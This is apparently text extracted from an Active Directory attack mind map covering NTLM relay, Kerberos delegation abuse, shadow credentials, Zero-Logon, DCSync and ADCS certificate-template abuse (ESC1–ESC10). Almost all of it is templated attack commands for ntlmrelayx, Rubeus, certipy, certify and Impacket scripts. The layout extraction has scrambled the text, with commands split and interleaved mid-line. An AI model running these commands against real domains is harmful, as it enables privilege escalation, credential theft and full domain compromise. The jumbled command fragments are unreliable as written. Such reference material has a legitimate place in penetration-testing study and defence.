MATCH (u:User {owned:true}), (c:Computer
{name: "<MYTARGET.FQDN>"}),
Kerberos Delegation p=shortestPath((u)-[*1..]->(c)) RETURN p
NTLM Relay

use exploit/windows/smb/smb_relay Rubeus hash /password:<password>

With protocol transition (any)
#windows200 / windows server2008 Admin
relay on itself MS08-068 Object: msDS-AllowedToDelegateTo
UAC: TRUST_TO_AUTH_FOR_DELEGA HOST psexec \\\<target> <cmd>
TION
NetNTLMv1 remove mic
Rubeus s4u /ticket:<ticket> /impersonateuser: Enter-Pssession -computername <target>
Rubeus asktgt /user:<user> /domain:<domain> <admin_user> /msdsspn:<spn_constrained>
ntlmrelayx.py --remove-mic --escalate-user /aes256:<AES 256 hash> /altservice:CIFS /ptt Altservice HTTP
<user> -t ldap://<dc_fqdn> -smb2support DcSync Invoke-Command <target> -Scriptblock
Constrained delegation Kerberos TGS
{<cmd>}
SMB -> LDAP(S)
ntlmrelayx.py -t ldaps://<dc> --remove-mic --
add-computer <computer_name> CIFS dir \\<target>\c$
<computer_password> --delegate-access - RBCD
NetNTLMv2 remove mic (CVE-2019-1040) relay to LDAP smb2support
LDAP

ntlmrelayx -t ldap://<dc> --shadow-credentials

--shadow-target '<dc>'
ntlmrelayx.py -wh <attacker_ip> -t
ldap://<target> -l /tmp -6 -debug
shadow credentials
Without protocol transition (kerberos only)
Users
Object: msDS-AllowedToDelegateTo
UAC: TRUSTED_FOR_DELEGATION
addcomputer.py -computer-name
'<rbcd_com>$' -computer-pass
'<rbcd_compass>' -dc-ip <dc>
'<domain>/<user>:<password>'
RBCD
rbcd.py -delegate-from '<rbcd_com>$' - getST.py -spn host/<constrained> -hashes '' getST.py -spn <constrained_spn>/<target> -
delegate-to '<constrained>$' -dc-ip getST.py -self -impersonate "administrator" - '<domain>/<computer_account>' -impersonate hashes '<hash>' '<domain>/<constrained>$' -
'<dc>' -action 'write' -hashes '<hash>' dc-ip <ip> Administrator --dc-ip <dc_ip> -additional-ticket impersonate Administrator --dc-ip <dc_ip> - Kerberos TGS
<domain>/<constrained>$ <domain>/<rbcd_com>$':'<rbcd_compass>' <previous_ticket> additional-ticket <previous_ticket>

HTTP(S) -> LDAP self RBCD

nmap -Pn -sS -T4 --open --script smb- rubeus.exe s4u /user:<fake_computer$>
security-mode -p445 ADDRESS/MASK /aes256:<AES 256 hash>
(MITM)
NTLM relay /impersonateuser:administrator
Listen and Relay
Find SMB not signed (default on non DC) use exploit/windows/smb/smb_relay /msdsspn:cifs/<victim.domain.local> Admin
rubeus.exe hash /password:<computer_pass> /altservice:krbtgt,cifs,host,http,winrm,RPCSS,w
/user:<computer> /domain:<domain> sman,ldap /domain:domain.local /ptt
cme smb $hosts --gen-relay-list relay.txt

ntlmrelayx.py -tf targets.txt -smb2support rbcd.py -delegate-from '<computer>$' - getST.py -spn host/<dc_fqdn>
(-6) --enum-domain Users
SMB unsigned delegate-to '<target>$' -dc-ip '<domain>/<computer_account>:
-> SMB '<dc>' -action 'write' <computer_pass>' -impersonate Administrator - Kerberos TGT

🔥
Object: msDS-
AllowedToActOnBehalfOfOtherIdentit <domain>/<user>:<password> -dc-ip <dc_ip>
ntlmrelayx.py -tf targets.txt -smb2support Resource-Based Constrained Delegation
lateral move (socks)
-socks (-6) (RBCD)
addcomputer.py -computer-name
'<computer_name>' -computer-pass
http ADCS web ESC8 '<ComputerPassword>' -dc-host <dc> -domain-
netbios <domain_netbios> '<domain>/<user>:
-> HTTP sccm ntlm relay attack <password>'
add computer account

ntlmrelayx.py -t mssql://<ip> -smb2support –

socks lateral move (socks)
relay to mssql
-> MSSQL

ntlmrelayx.py -t dcsync://<dc_02_ip> -
smb2support -auth-smb <user>:<password> DcSync
Zero-Logon (safe method) coerce come from dc01, relay to dc02
SMB -> Netlogon (CVE-2020-1472)

Arp poisoning
Weak ADCS configuration

pywsus.py
wsus relay ntlmrelayx.py -t Rubeus.exe asktgt /user:<user> /certificate:
http://<dc_ip>/certsrv/certfnsh.asp -debug - <base64-certificate> /ptt
smb2support --adcs --template
DomainController
gettgtpkinit.py -pfx-base64 $(cat cert.b64)
<domain>/<dc_name>$ <ccache_file> Pass the ticket DCSync DomAdmin
Web enrollement is up
🔥 ESC8
certipy relay -ca <ca_ip> -template
DomainController certipy auth -pfx <certificate> -dc-ip <dc_ip>

certipy req -u <user>@<domain> -p

<password> -target <ca_server> -template
'<vulnerable template name>' -ca <ca_name> -
upn <target_user>@<domain>
Pass the certificate

ESC1 (Request a certificate from a vulnerable certify.exe request /ca:<server>\<ca-name>

template) /template:"<vulnerable template name>"
[/altname:"Admin"]

certutil -v -dsTemplate ESC2

Get templates information certify.exe find [ /vulnerable] certify.exe request request /ca:<server>\<ca-
Misconfigured Certificate Templates
name> /template:<template> /onbehalfof:
certipy find -u <user>@<domain> -p certify.exe request /ca:<server>\<ca-name> <domain>\<user> /enrollcert:<path.pfx>
<password> -dc-ip <domaincontroller> /template:"<vulnerable template name>" [/enrollcertpw:<cert-password>]

Pass the certificate

ESC3 (Use an enrollement agent to request a
certipy req -u <user>@<domain> -p
certificate)
<password> -target <ca_server> -template
'<vulnerable template name>' -ca <ca_name>
certipy req -u <user>@<domain> -p
<password> -target <ca_server> -template
'<vulnerable template name>' -ca <ca_name> -
on-behalf-of '<domain>\<user>' -pfx <cert>

certipy template -u <user>@<domain> -p

'<password>' -template <vuln_template> -
certipy template -u <user>@<domain> -p restore template configuration <template>.json
'<password>' -template <vuln_template> -save- ESC1 on vulnerable template
write privilege over a certificate template old -debug
ESC4

ADCS weak configuration certipy ca -ca <ca_name> -add-officer '<user>'

certipy find -u <user>@<domain> -p
<password> -dc-ip <domaincontroller>
getACL information
-username <user>@<domain> -password certipy ca -u <user>@<domain> -p certipy req -u <user>@<domain> -p
Misconfigured ACL <password>
Manage CA '<password>' -ca <ca_name> -issue-request '<password>' -ca <ca_name> -retreive Pass the certificate
<request_id> <request_id>
Issue request
certipy req -username <user>@<domain> -
ESC7 certipy ca -ca <ca_name> -enable-template password <password> -ca <ca_name> -
'<ecs1_vuln_template>'-username template '<vulnerable template name>' -upn
Manage certificate <user>@<domain> -password <password> '<target_user>' error, but save private key

certutil -TCAInfo
Display CA information
certify.exe cas

Abuse ATTRIBUTESUBJECTALTNAME2 flag set

on CA
certutil -config "CA_HOST\CA_NAME" -getreg you can choose any certificate template that ESC1
"policy\EditFlags" permits client authentication
Misconfigured CA ESC6
Get CA flags (if remote registry is enabled)
certipy / certify.exe (only the flag
ATTRIBUTESUBJECTALTNAME2)

Get PKI objects information certify.exe pkiobjects vulnerable PKI Object access control ESC5 ACL

certipy req -username <accountB>@<domain>

-hashes <hashB> -ca <ca_name> -template
<vulnerable template>
certipy account update -username ESC9
<accountA>@<domain> -password <passA> - certipy account update -username
user <accountB> -upn Administrator <accountA>@<domain> -password <passA> -
ESC9/ESC10 (Case 1) certipy req -username <accountB>@<domain> [Kerberos Mapping] ESC9/ESC10(Case 1)
user <accountB> -upn <accountB>@<domain>
certipy shadow auto -username -hashes <hashB> -ca <ca_name> -template
<any template with client auth> Reset accountB UPN Pass the certificate
<accountA>@<domain> -p <passA> -account
ESC10 (Case 1) [Schannel Mapping] ESC9/ESC10 (Case 2)
<accountB>
Misconfigured Certificate Mapping
ESC9/ESC10
(blind test)
certipy account update -username
<accountA>@<domain> -password <passA> -
user <accountB> -upn '<dc_name$>@<domain>'
ESC10 (Case 2)